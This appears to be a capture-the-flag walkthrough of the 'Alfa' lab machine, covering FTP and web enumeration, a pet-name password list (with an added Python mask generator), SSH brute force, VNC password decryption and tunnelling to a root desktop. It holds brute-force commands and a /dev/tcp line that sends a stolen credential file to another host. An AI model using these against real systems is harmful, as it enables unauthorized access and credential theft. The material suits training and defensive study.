Alfa starts with enumeration of FTP to obtain a username and an image file named after a pet. It continues with finding a hidden path to an intranet support chat via the robots.txt file. The chat conversation reveals sensitive information that allows me to guess a user’s password for initial access. In the user’s home directory there is a VNC password file, which can be used to log into the VNC server that is already running as root.

Skills Learned

  • Generating a password list
  • Brute-forcing FTP and SSH
  • VNC password decryption
  • SSH tunneling

Tools

Reconnaissance

Nmap

An initial scan with nmap discovers four open ports: FTP on port 21, HTTP on port 80, and SMB on ports 139 and 445.

→ root@iamf «alfa» «192.168.2.103» 
$ nmap -sC -sV -oA nmap/10-initial-alfa 192.168.2.109 -v
# Nmap 7.80 scan initiated Thu Apr 22 02:41:12 2021 as: nmap -sC -sV -oA nmap/10-initial-alfa -v 192.168.2.109
Nmap scan report for 192.168.2.109
Host is up (0.00056s latency).
Not shown: 996 closed ports
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x    2 0        0            4096 Dec 17 13:02 thomas
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.2.103
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp  open  http        Apache httpd 2.4.38 ((Debian))
| http-methods: 
|_  Supported Methods: OPTIONS HEAD GET POST
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Alfa IT Solutions
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
MAC Address: 08:00:27:9C:8A:46 (Oracle VirtualBox virtual NIC)
Service Info: Host: ALFA; OS: Unix

Host script results:
|_clock-skew: mean: -40m01s, deviation: 1h09m16s, median: -2s
| nbstat: NetBIOS name: ALFA, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   ALFA<00>             Flags: <unique><active>
|   ALFA<03>             Flags: <unique><active>
|   ALFA<20>             Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|   WORKGROUP<00>        Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|_  WORKGROUP<1e>        Flags: <group><active>
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.9.5-Debian)
|   Computer name: alfa
|   NetBIOS computer name: ALFA\x00
|   Domain name: \x00
|   FQDN: alfa
|_  System time: 2021-04-22T08:41:36+02:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-04-22T06:41:36
|_  start_date: N/A

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Apr 22 02:41:38 2021 -- 1 IP address (1 host up) scanned in 26.16 seconds

nmap also identified that anonymous login is allowed on FTP.

A full port scan discovers a fifth port.

→ root@iamf «alfa» «192.168.2.103» 
$ nmap -p- -oA nmap/10-allports-alfa 192.168.2.109 -v
Starting Nmap 7.80 ( https://nmap.org ) at 2021-04-22 02:53 EDT
Nmap scan report for 192.168.2.109
Host is up (0.00040s latency).
Not shown: 65530 closed ports
PORT      STATE SERVICE
21/tcp    open  ftp
80/tcp    open  http
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
65111/tcp open  unknown
MAC Address: 08:00:27:9C:8A:46 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 36.32 seconds
           Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)

Poking port 65111 with nc reveals it’s SSH.

→ root@iamf «alfa» «192.168.2.103» 
$ nc 192.168.2.109 65111
SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2

Enumeration

TCP 21 - FTP

Enumeration on FTP discovers a potential username, thomas, and an image file named milo.jpg.

→ root@iamf «alfa» «192.168.2.103» 
$ ftp 192.168.2.109 
Connected to 192.168.2.109.
220 (vsFTPd 3.0.3)
Name (192.168.2.109:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        0            4096 Dec 17 13:02 thomas
226 Directory send OK.
ftp> cd thomas
250 Directory successfully changed.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0          104068 Dec 17 12:49 milo.jpg

milo.jpg is a picture of a dog.

image-20210613181756997

TCP 445 - SMB

On SMB, an anonymous (null-session) login is allowed, but neither of the listed shares grants read permission.

→ root@iamf «alfa» «192.168.2.103» 
$ crackmapexec smb 192.168.2.109 -u 'ANONYMOUS' -p '' --shares
SMB         192.168.2.109   445    ALFA             [*] Windows 6.1 (name:ALFA) (domain:) (signing:False) (SMBv1:True)
SMB         192.168.2.109   445    ALFA             [+] \ANONYMOUS: 
SMB         192.168.2.109   445    ALFA             [+] Enumerated shares
SMB         192.168.2.109   445    ALFA             Share           Permissions     Remark
SMB         192.168.2.109   445    ALFA             -----           -----------     ------
SMB         192.168.2.109   445    ALFA             print$                          Printer Drivers
SMB         192.168.2.109   445    ALFA             IPC$                            IPC Service (Samba 4.9.5-Debian)

TCP 80 - Web

Visiting port 80 shows a website titled with “Alfa IT Solutions”.

image-20210422143723577

Nothing useful in the page source.

Gobuster

A gobuster scan discovers a robots.txt file.

→ root@iamf «alfa» «192.168.2.103» 
$ gobuster dir -u http://192.168.2.109/ -x html,txt,bak -w /opt/SecLists/Discovery/Web-Content/raft-large-directories.txt -o gobuster/gobuster-L-80 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.2.109/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /opt/SecLists/Discovery/Web-Content/raft-large-directories.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              html,txt,bak
[+] Timeout:                 10s
===============================================================
2021/04/22 02:46:48 Starting gobuster in directory enumeration mode
===============================================================
/js                   (Status: 301) [Size: 311] [--> http://192.168.2.109/js/]
/images               (Status: 301) [Size: 315] [--> http://192.168.2.109/images/]
/css                  (Status: 301) [Size: 312] [--> http://192.168.2.109/css/]   
/index.html           (Status: 200) [Size: 3870]                                  
/fonts                (Status: 301) [Size: 314] [--> http://192.168.2.109/fonts/] 
/robots.txt           (Status: 200) [Size: 459]                                   
/server-status        (Status: 403) [Size: 278] 

robots.txt

Accessing robots.txt reveals some directories, but these are just dummies.

image-20210422134810181

Fetching robots.txt with curl reveals a string below the dummy entries that looks like a Brainfuck program.

→ root@iamf «alfa» «192.168.2.103» 
$ curl -s http://192.168.2.109/robots.txt
/home #404
/admin #404
/login #404
/images #200, directory listing, nothing interesting
/cgi-bin #404
/intranet #404
/wp-admin #404
/wp-login #404

...<SNIP>...
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>+++++++++++++++++.>>---.+++++++++++.------.-----.<<--.>>++++++++++++++++++.++.-----..-.+++.++.

Using this site, the string decodes to /alfa-support.

image-20210613181246585

/alfa-support

On /alfa-support, there is a chat between Thomas, an employee, and the IT support operator (I think?).

image-20210422143814423

From the conversation above, I’ll note that Thomas uses a password that consists of his (or her?) pet’s name followed by 3 numerical digits.

Foothold

Shell as Thomas

Creating Wordlist

From the previous FTP enumeration, ‘milo’ is most likely the name of Thomas’s pet. With bash, I can generate all the possible passwords used by Thomas (1000 candidates, milo000 through milo999; the zero-padded brace expansion keeps the three-digit format).

→ root@iamf «alfa» «192.168.2.103» 
$ for i in {000..999}; do echo "milo$i"; done | tee passwords
milo000
milo001
milo002
milo003
...<snip>...
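As an added example that goes beyond the page’s bash one-liner, the script below expands a hashcat-style mask (`?d` digit, `?l` lowercase, `?u` uppercase) into candidates, builds the pet-name pattern from the chat (also trying a capitalised name, which the page does not), and splits the result into files the way the SSH brute force later does. It is not the author’s code; the mask syntax, the output file names and the capitalised variant are my assumptions.

```python
"""Expand a hashcat-style mask into a candidate password list (added example)."""
import itertools
import string
from pathlib import Path

# Charset escapes supported by this mini mask engine (subset of hashcat's).
CHARSETS = {"d": string.digits, "l": string.ascii_lowercase, "u": string.ascii_uppercase}


def parse_mask(mask: str) -> list:
    """Turn 'milo?d?d?d' into a list of per-position alphabets."""
    positions, i = [], 0
    while i < len(mask):
        if mask[i] == "?":
            if i + 1 >= len(mask) or mask[i + 1] not in CHARSETS:
                raise ValueError(f"bad charset escape at offset {i} in {mask!r}")
            positions.append(CHARSETS[mask[i + 1]])
            i += 2
        else:
            positions.append(mask[i])   # literal character: a single-element alphabet
            i += 1
    return positions


def expand_mask(mask: str) -> list:
    """All candidates for a mask, in lexical order (same order as bash {000..999})."""
    return ["".join(p) for p in itertools.product(*parse_mask(mask))]


def candidates_for_pet(pet: str, digits: int = 3) -> list:
    """Pattern from the support chat: pet name followed by N digits.

    The capitalised variant is an assumption; people often write 'Milo123'.
    Duplicates are removed while preserving order so the list stays stable.
    """
    seen, out = set(), []
    for name in (pet.lower(), pet.capitalize()):
        for word in expand_mask(name + "?d" * digits):
            if word not in seen:
                seen.add(word)
                out.append(word)
    return out


def split_wordlist(words: list, parts: int) -> list:
    """Split into `parts` near-equal chunks, e.g. to run several brute-force jobs."""
    size = -(-len(words) // parts)   # ceiling division
    return [words[i:i + size] for i in range(0, len(words), size)]


def write_chunks(words: list, parts: int, prefix: str = "passwords") -> list:
    """Write passwords1, passwords2, ... (file name prefix is an assumption)."""
    paths = []
    for n, chunk in enumerate(split_wordlist(words, parts), start=1):
        path = Path(f"{prefix}{n}")
        path.write_text("\n".join(chunk) + "\n")
        paths.append(path)
    return paths


if __name__ == "__main__":
    words = candidates_for_pet("milo")
    print(f"{len(words)} candidates, from {words[0]} to {words[-1]}")
    for p in write_chunks(words, 2):
        print("wrote", p)
```

hashcat’s own mask mode produces the same digit list with `hashcat -a 3 --stdout 'milo?d?d?d'`; the script is useful when you want the list in a file for hydra or crackmapexec without installing hashcat.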

Brute force - FTP

I tried it with Hydra on FTP, but it returns nothing. (Note that the command below targets 192.168.2.103, the attacking host, rather than 192.168.2.109, which is why hydra reports that targets could not be connected; the FTP result is therefore not conclusive.)

→ root@iamf «alfa» «192.168.2.103» 
$ hydra -l thomas -P passwords ftp://192.168.2.103 
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-04-22 03:43:09
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1000 login tries (l:1/p:1000), ~63 tries per task
[DATA] attacking ftp://192.168.2.103:21/
[STATUS] 320.00 tries/min, 320 tries in 00:01h, 713 to do in 00:03h, 16 active
[STATUS] 317.00 tries/min, 634 tries in 00:02h, 399 to do in 00:02h, 16 active
[STATUS] 315.67 tries/min, 947 tries in 00:03h, 86 to do in 00:01h, 16 active
1 of 1 target completed, 0 valid passwords found
[WARNING] Writing restore file because 15 final worker threads did not complete until end.
[ERROR] 15 targets did not resolve or could not be connected
[ERROR] 0 targets did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-04-22 03:46:35

Brute force - SSH

This time I will use crackmapexec, and I will divide the wordlist into two files:

  • passwords1: 000-500
  • passwords2: 500-999

→ root@iamf «alfa» «192.168.2.103» 
$ crackmapexec ssh 192.168.2.109 -u thomas -p passwords2 --port 65111

After some minutes it returns one valid combination: thomas:milo666

image-20210422151432013

SSH - Thomas

I’ll just log in via SSH and grab the flag.

→ root@iamf «alfa» «192.168.2.103» 
$ ssh -p 65111 thomas@192.168.2.109
thomas@192.168.2.109's password: 
Linux Alfa 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64

####################################################################
#                  ,---------------------------,                   #
#                  |  /---------------------\  |                   #
#                  | |                       | |                   #
#                  | |         +----+        | |                   #
#                  | |         |ALFA|        | |                   #
#                  | |         +----+        | |                   #
#                  | |                       | |                   #
#                  |  \_____________________/  |                   #
#                  |___________________________|                   #
#                ,---\_____     []     _______/------,             #
#              /         /______________\           /|             #
#            /___________________________________ /  | ___         #
#            |                                   |   |    )        #
#            |  _ _ _                 [-------]  |   |   (         #
#            |  o o o                 [-------]  |  /    _)_       #
#            |__________________________________ |/     /  /       #
#        /-------------------------------------/|      ( )/        #
#      /-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/ /                   #
#    /-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/ /                     #
#     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~                       #
#  ██╗    ██╗███████╗██╗      ██████╗ ██████╗ ███╗   ███╗███████╗  #
#  ██║    ██║██╔════╝██║     ██╔════╝██╔═══██╗████╗ ████║██╔════╝  #
#  ██║ █╗ ██║█████╗  ██║     ██║     ██║   ██║██╔████╔██║█████╗    #
#  ██║███╗██║██╔══╝  ██║     ██║     ██║   ██║██║╚██╔╝██║██╔══╝    #
#  ╚███╔███╔╝███████╗███████╗╚██████╗╚██████╔╝██║ ╚═╝ ██║███████╗  #
#   ╚══╝╚══╝ ╚══════╝╚══════╝ ╚═════╝ ╚═════╝ ╚═╝     ╚═╝╚══════╝  #
####################################################################

thomas@Alfa:~$ id
uid=1000(thomas) gid=1000(thomas) grupos=1000(thomas),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
thomas@Alfa:~$ ls -l
total 4
-rw-r--r-- 1 thomas thomas 1332 dic 20 11:04 user.txt

Privilege Escalation

Shell as root

Internal enumeration

In thomas’s home directory there is a file called .remote_secret; it is owned by root but world-readable and world-writable (mode 777).

thomas@Alfa:~$ ls -la
total 40
drwxr-xr-x 4 thomas thomas 4096 dic 20 22:22 .
drwxr-xr-x 3 root   root   4096 dic 16 07:58 ..
-rw------- 1 thomas thomas    4 dic 20 22:22 .bash_history
-rw-r--r-- 1 thomas thomas  220 dic 16 07:58 .bash_logout
-rw-r--r-- 1 thomas thomas 3526 dic 16 07:58 .bashrc
drwx------ 3 thomas thomas 4096 dic 16 21:15 .gnupg
drwxr-xr-x 3 thomas thomas 4096 dic 16 20:44 .local
-rw-r--r-- 1 thomas thomas  807 dic 16 07:58 .profile
-rwxrwxrwx 1 root   root     16 dic 17 23:35 .remote_secret
-rw-r--r-- 1 thomas thomas 1332 dic 20 11:04 user.txt

At first, I assumed it was some kind of service hijacking, but the file contents appeared to be binary or encrypted.

thomas@Alfa:~$ cat .remote_secret 
"�Cc�"�Cc

Running pspy reveals a TigerVNC server (Xtigervnc) running as root (UID=0), bound to localhost only (-localhost) on port 5901, and authenticating with the password file /root/.vnc/passwd (-rfbauth).

2021/04/22 10:47:57 CMD: UID=0    PID=404    | /usr/bin/Xtigervnc :1 -desktop Alfa:1 (root) -auth /root/.Xauthority -geometry 1900x1200 -depth 24 -rfbwait 30000 -rfbauth /root/.vnc/passwd -rfbport 5901 -pn -localhost -SecurityTypes VncAuth    

VNC Decrypt

This .remote_secret is a VNC password file, and I can use vncpwd to decrypt it (I’ve also done this previously on HTB: Cascade). A VNC password file holds the password DES-encrypted with a fixed, publicly known key, so it is obfuscated rather than protected. The 16-byte size means it holds two 8-byte blocks, as TigerVNC’s vncpasswd writes when a view-only password is also set; the first block is the primary password. I’ll transfer the file to my attacking machine and decrypt it there (with SSH available, scp -P 65111 thomas@192.168.2.109:.remote_secret . would do as well).

On Alfa:

thomas@Alfa:~$ cat .remote_secret > /dev/tcp/192.168.2.103/9000

On my Kali:

→ root@iamf «alfa» «192.168.2.103» 
$ nc -nvlp 9000 > remote_secret
listening on [any] 9000 ...
connect to [192.168.2.103] from (UNKNOWN) [192.168.2.109] 57532

The file decrypts to k!LL3rSs.

→ root@iamf «alfa» «192.168.2.103» 
$ ./vncpwd remote_secret 
Password: k!LL3rSs

I tried the password on root, but it didn’t work. The next option here is to access the VNC server using this password.

Accessing VNC

Since the VNC server is bound to localhost and not reachable from outside, I’ll need port forwarding to interact with it.

On thomas’s session

thomas@Alfa:~$ ~C
ssh> -L 5901:localhost:5901 
Forwarding port.

That will create a tunnel from my Kali localhost:5901 to Alfa’s localhost:5901. The ~C escape is only recognised at the beginning of a line in an interactive OpenSSH session; the same tunnel can be opened up front with ssh -p 65111 -L 5901:localhost:5901 thomas@192.168.2.109.

Now I can connect to the VNC server using vncviewer (it’s preinstalled on Kali) and supply the remote_secret file to the -passwd option; the viewer reads the obfuscated file directly, so the password never needs to be typed.

→ root@iamf «alfa» «192.168.2.103»  
$ vncviewer -passwd remote_secret 127.0.0.1:5901
Connected to RFB server, using protocol version 3.8
Performing standard VNC authentication
Authentication successful
Desktop name "Alfa:1 (root)"
VNC server default format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor.  Pixel format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Same machine: preferring raw encoding

It opens this window, and I’m already root.

image-20210422160633799

To be honest, this is actually guessing.

At first I doubted that this remote_secret was shared with the root user, but that’s how I pwned this machine.
